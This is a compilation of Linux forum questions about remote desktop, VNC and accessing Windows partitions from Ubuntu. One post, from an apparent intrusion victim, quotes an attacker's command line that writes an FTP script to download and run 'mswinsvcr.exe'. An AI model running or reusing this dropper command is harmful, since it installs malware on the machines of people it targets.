Ubuntu Security :: Remote Access To Windows Partition?

Aug 8, 2010

Is it possible to remotely access, inject, manipulate files and/or folders in the Windows NTFS partition when logged into Ubuntu?

I'm either logged into Windows or Ubuntu but NOT both -- ever. Therefore, while logged into Ubuntu, would it be possible for someone to crack into Windows via Ubuntu using Wi-Fi or modem?

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Ubuntu :: Can't Access Or Even Find Files On Windows Partition Or Windows Partition Itself

Sep 24, 2010

After several times install & reinstall,i got a stable dual boot vista / ubuntu 10.10.,but i can't access or even see my windows partition from ubuntu,i installed my dual boot with wubu this time,in previous installation when i didn't use wubi , i didn't have such a problem & windows partition with all my files in it (windows files,media ,etc,) was easily accessible from "places" on ubuntu . I already disabled windows firewall & other security options but nothing changed

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Ubuntu Security :: How To Remote Access Home Pc

Jan 29, 2010

how i can remote access my pc at home from work ? on different pc that has access to INTERNET. what software shall I install on my pc at home ? I want to be able to install software on my pc at home from my work place, my home pc has unbuntu Linux ubuntu 2.6.31-17-generic #54-Ubuntu SMP Thu Dec 10 17:01:44 UTC 2009 x86_64 GNU/Linux

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Ubuntu Security :: Random Outside IP Trying To Access Remote Desktop

Jun 5, 2011

I was sitting watching a TV show on the internet (streaming from channel 4) and all of a sudden I get a request from an unknown IP address, outside of my local network attempting to access my ubuntu desktop, I obviously declined straight away and stupidly didn't take note of the IP I've checked my firewall settings and no ports are being forwarded, everything is as it should be. I am running Ubuntu 11.04, and a little bit concerned. As of now I have completely disabled remote desktop on my laptop.

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CentOS 5 :: 5.6 Upgrade - Security For Remote Access?

Aug 19, 2011

I setup a remote web server yesterday evening, which had Centos 5.3 on it. This went well, and I did this mostly over vnc, to get a GUI. However, I hadn't realised that there was a pending cron job to 'yum upgrade'. So, come 2am, 5.3 turned into 5.6. I carried on the install today, but after some time (I'm not sure exactly how or when), I lost the ability to run any GUI system config tools that required root login. I also lost the ability to run anything graphical - emacs, for example, when I was already root in an xterm.

/var/log/secure isn't telling me anything. It claims that it's running the config tool on my behalf, but nothing happens. If I try to run emacs, I get a message saying that the X server isn't responding. Could this be related to the upgrade? It feels like a PolicyKit problem - I've seen something similar on 6.0 for remote access over vnc - but 5.6 isn't running PolicyKIt.

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Ubuntu Security :: Access Remote Hard Drive From Another Computer

Jan 12, 2010

What I want to do is pull data from any of the hard drives attached to my Linux box from my Windows machine. I have been moving small amounts of data from the drives to my OS drive and those parts share easily, but I want to move away from that method to move large amounts of data at the same time.I have tried using Samba as it is used for file sharing between systems and that I have to give my Windows box permission through Samba.

Trick is, I'm not sure where to start, though I have an idea and wanted to know if this is the right track before I start editing my file system.

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Ubuntu Security :: Host Always Ask Password On 1st Remote Desktop (VNC) Access

Dec 30, 2010

host always ask password on 1st remote desktop (VNC) access Desktop version... how can I disable this?

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Security :: Use Different PAM Modules Depending On Local/remote Access?

Mar 16, 2010

I'm using a fingerprint reader on my laptop, works pretty well:

$sudo echo hi
Please swipe your finger:
[swipe finger here of course]


Like I said, it works nicely... until I try to SSH in and sudo something remotely, when it will ask me kindly to swipe my finger over the reader that's attached to the laptop which is on my desk at home thirty kilometres away. Naturally there's no method built into pam_fprint to abort via a keypress.

So, is there any way to tell PAM to only use certain modules if I'm in a locally logged in session?

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Ubuntu Security :: Unwanted Remote Desktop Access And Attempted Hack

Jul 20, 2010

I was running ubuntu 10.04 on a school laptop connected to the network. I was editing a file in emacs on an ssh connection to a school server when all of a sudden I see the remote desktop graphic (a thing that looks like a widescreen monitor) pop up in the top panel. A second later it announces that someone else has connected to my computer with 'ffff:someip'. I'm not sure of the specifics because I was too shocked. I do remember it started with some number of f's before a : The hacker then started typing
del eq&e

I promptly yanked out the ethernet cable before anything else could be typed. I then went in and changed the Remote Desktop preferences to not allow anyone in. I'm guessing that I cut the hacker off from fully entering in a command similar to this:
del eq&echo open 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq
which I found here: [URL]

How concerned should I be? It appears to be a windows hack. Did I prevent any damage from occurring? Is Remote Desktop really that easy to connect to another persons computer? I know this question is bait in a way. On my home machines I only allow vnc via ssh tunnels and that is through a router with proper port forwarding for the ssh ports and very few other ports forwarded. Such an attack has never happened to me at home. Is this possibly due to my setup or was I just lucky no one picked my computer to hack? So is the ssh tunnel & port forwarding a sufficiently safe setup or am I still at risk?

What degree of protection does the ssh tunnel and port forwarding provide? What else should I do to make my current home setup even more secure? The text I wrote above was the only text typed into the terminal. Because the attack was over Remote Desktop, what is the possibility that it was a bot? The text appeared slow enough for me to think that there was a person rather than a machine/program typing in the text. Does the Remote Desktop connection in a way provide a level of abstraction that prevents scripts as commands must be typed in through the Remote Desktop connection (vs. a ssh connection where a script might more easily be uploaded and executed)?

In the end I'm curious as to what else might have been accessed over the connection or if it was probably just restricted to the hacker attempting to run some windows commands? Since they connected via Remote Desktop and I saw the connection pop up and the typing begin in my terminal, did I see everything that the hacker attempted to perform? Am I correct in my research in finding that there is no log for Remote Desktop connections and therefore I can't find the ip they were connecting from? However, I would like to use this as a wake up call to myself to prevent unwanted access on my home computers.

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Ubuntu :: 10.04 And Windows 7 Remote Access?

May 10, 2010

I have a Windows 7 (Home Premium) computer and another computer with a fresh installation of Ubuntu 10.04 (32-Bit) on it. Since I have the computer with Windows 7 and it doesn't come with Remote access due to it not being at least the Professional edition (which is really lame if you ask me!), I won't be able to access my Windows computer from my Ubuntu computer (from what I have gathered from [URL].. So my question is how can I access my Ubuntu computer from my Windows 7 machine? Does this require more then just installing Samba on the linux machine? I do have RealVNC Enterprise edition 4.51 if that will work?

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Ubuntu :: Remote Access Software To Windows Xp?

May 12, 2010

Just curious your recommendations for remotely access windows xp computers from ubuntu. The current setup i use is tightvnc listener on ubuntu and ultra vnc single click on the windows xp computers.

I know rdesktop is widely used but i would like to continue their session so they can show me what is going wrong.

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Ubuntu :: Any Other Way To Access Any Remote Windows System

Feb 19, 2011

I am using ubuntu 10.10 netbook remix version. I want to access a remote computer outside my LAN which is running on Windows.I tried vinagre for the LAN but the result is that the client (running on windows) system goes logged off making the client completely unaware about what is going on with his system.Is there any other way to access any remote Windows system ans still the client able to see and interact while it has been accessed by ubuntu.

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Ubuntu :: Remote Access To Windows XP On The Same Computer

Mar 6, 2011

I have windows XP and Ubuntu 10.10 installed on the same computer. I want to remote access windows xp from Ubuntu. I have tried remote desktop viewer, terminal server client and tight VNC but nothing works.

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General :: Remote Access To Ubuntu Desktop From Windows?

Aug 26, 2010

I am having the following problems:I have tried installing vnctightserver on Ubuntu and then installing the viewer on my windows machine but when I try to connect it rejects the connection....I need to remotely access the ubuntu-desktopn my ubuntu server LTS 10.04..... I have tried a number of guides but none are working for me....I have a firewall installed (iptables) but the neccesary ports have been opened up but my server still rejects incoming vnc connections.On a side note I do not have physical access to the server so all setup needs to be done via SSH...

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Installation :: Access The Windows Partition But In Vista Cant See The Partition?

Feb 19, 2010

I installed XandROS on my vista machine. I can access the Windows partition from Linux but in Vista I cant see the Linux partition...is there anything I can do about that?

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General :: Make A Remote Access From A Ubuntu To A Windows 7 Machine Using RDP?

Aug 11, 2011

There is a way to make a remote access from a Ubuntu Linux to a Windows 7 machine using RDP(Remote Desktop Protocol)? I use "mstsc.exe" for Windows to Windows connections. What is like "mstsc.exe" that I can easily run from Ubuntu?

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Ubuntu Security :: Access Partition From Another Machine?

Jan 18, 2010

I have installed an Ubuntu server and it running OK. Before making it a production server, I want to make sure one day if the OS corrupts accidentally, I can still access the users' files on the hard disk.

I burned a Ubuntu desktop live CD, and booted it with this machine. There are 2 hard disks on the server, both could be mounted automatically. However, I can only access some folders like lost+found.

The questions are:

1. how can I access the other folders, given I have the root password of the server.

2. is there a way to access all folders without knowing the users + passwords?

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Ubuntu Security :: 10.4 Allows To Access Win Partition Without Password?

May 23, 2010

I have a dual boot machine and recently did a fresh install of 10.4. It no longer asks for a password to access the Windows partition and I full access to it. This seems insecure to me and was wondering if someone else came across this. I thought I saw this topic discussed before but I can not seem to find it now. Is this a bug or a new unpleasant feature?I don't think it makes a difference but I do have a separate encrypted home partition on this fresh install. I have also done two fresh installs. (Well three...once testing out KDE but didn't try the Win partition. )

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OpenSUSE :: Mount A Remote Windows Partition Onto Local Host Through Rdesktop?

Mar 26, 2011

basically i am able to connect to my other windows machine using rdesktop I want to be able to mount the window machine's partition (particularly my media folder cusermyaccountVideo) i know rdesktop ipaddr -r disk: blah blah blah mounts the partition onto the local machine however, i cant figure out what the specific commands are i tried followings but with no luck

rdesktop ipaddr -u username -p password -r :c=mntmntpoint
rdesktop ipaddr -u username -p password -r :c=mntmntpoint
rdesktop ipaddr -u username -p password -r :cmyaccountVideo=mntmntpoint

all these commands didnt work do anyone know how to do this? i thikn there must be a way

PS: no luck with smbfs as my machines arent on the same lan network (not sure if samba can connect remotely)

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Ubuntu :: How To Access Windows Partition

Oct 18, 2010

I have a desktop, a cellphone. I do NOT HAVE a disk drive, a USB stick or anything of the sort.

The desktop has two operating systems on a single hard drive: Ubuntu 10.04 and Windows 7. I need to get internet access in Windows 7.

The cellphone is a Galaxy S Vibrant, and is tethered so that I can connect to the internet through it. In Ubuntu, the tether is automatically supported. I just shove a USB cable between the cellphone and the phone and I've got internet in Linux. But in Windows, the tether needs drivers. I can't connect to my phone in Windows without them.

So, I pretty much have to put the installer in Windows from Linux, so I can run it, have internet in Windows and not get fired tomorrow.

I have $0, so picking up (or borrowing) something I can use to talk between the two computers is not an option.

But in Ubuntu, I do not see my Windows partition. It's not in media and it's not in mnt.

What can I do to get a damn file over to Windows?

Note in bold and italic to show that it's important: NTFS-Config only shows my Ubuntu drive, it seems.

EDIT: Oh boy, I screwed up.


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General :: Windows - Accessing The Desktop Of A Linux Machine (server) Throught Remote Access?

Jun 8, 2011

I was looking for:how to access my Linux machine(OpenSuse 11.3) that is being hosted at my hoster company from my home Win Pc, I found TightVNC , but I am confused, should I install it on both systems ( viewer and server) ? .. what about the VirtualBox , can i Access with that tool or it is only for mounting the local Virtual Machines?

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Ubuntu :: Disallow Access To Windows 7 Partition

May 14, 2011

I have Windows 7 and Ubuntu 10.04 installed on the same harddrive. I'm using grub to boot both. I would like to deny access to the windows partitions, but allow access to removable drives and shared drives.

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Ubuntu :: Access Ext3 Partition In Windows 7?

Jun 29, 2011

I am currently using ubuntu 10.04,I want to access ext3 or any partition supported on linux in windows 7. Is there any way,i want to use partition as any other drive in windows.

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Ubuntu Security :: 10.04 - Scan Windows Partition For Virus?

May 12, 2010

I'm dual booting 10.04 with windows 7 and it occurs to me that I could scan the windows partition for viruses FROM linux. Is anybody doing this sort of thing? Does that make any sense?

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Ubuntu Security :: Clean Windows Partition With ClamAV

May 30, 2011

My windows partition is infected and I recall that it is supposed to be possible from the linux partition with ClamAV. Now I'm running Fedora12 but this forum is much more active and I suppose that doesn't make a big difference. I tried to find something on google but most procedures seem to involve a Live CD but it would be more convenient for me to just do it from my linux distro running. Is there anything I have to be aware of or is it literally just scanning the windows partition with ClamAV?

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Ubuntu :: Permanently Disabling Access To Windows Partition?

Aug 11, 2010

I have ubuntu installed on an external hard drive. My ubunutu "Places" shows my windows partition which is on my internal hard drive. I would like to PERMANENTLY disable accessing windows partition in Ubuntu. I don't want to set authentication,etc. I want to PERMANENTLY disable it. I tried commenting "/etc/fstab" file but it still shows up in "Places" tab. I absolutely hate this. I would like to get rid of this. If nothing goes well I will get rid of Ubuntu itself.

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Ubuntu :: Access Windows (NTFS) Partition In 10.10 Maverick?

Dec 16, 2010

I tried to search around for a way to access my windows partition from within Linux. I was unable to mount the same using "mount" command. I read of a tool "ntfs-config" as well, this too didn't work for me.

Please share if anyone out there has an idea on how we can access the windows partition (NTFS) from within Ubuntu 10.10 Maverick.


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General :: Access Files On The Windows Partition Using Ubuntu?

Apr 4, 2011

I would like to know if there is a way that I can access my files on the Windows partition using Linux because the Linux partition does not have enough space to house all the files on the Windows partition.

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General :: Ubuntu: Unable To Access Windows Partition

Oct 17, 2010

I have partioned my harddrive when I installed ubuntu 10.10 Desktop edition, 32-bit. But, after I installed it I can no longer access the Windows partition. I have never played with Linux OS before. I will provide a screen-shot of the partition. [URL]

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Ubuntu :: Access Is Denied Setting Folder Security From Windows?

Dec 28, 2010

Is there a way to set the permissions on files and folders from a Windows server or workstation? The partition is NTFS and is mounted as NTFS, but whenever I right click on a file or folder on the Ubuntu server from a Windows computer and try to change the permissions I get "Access Is Denied".

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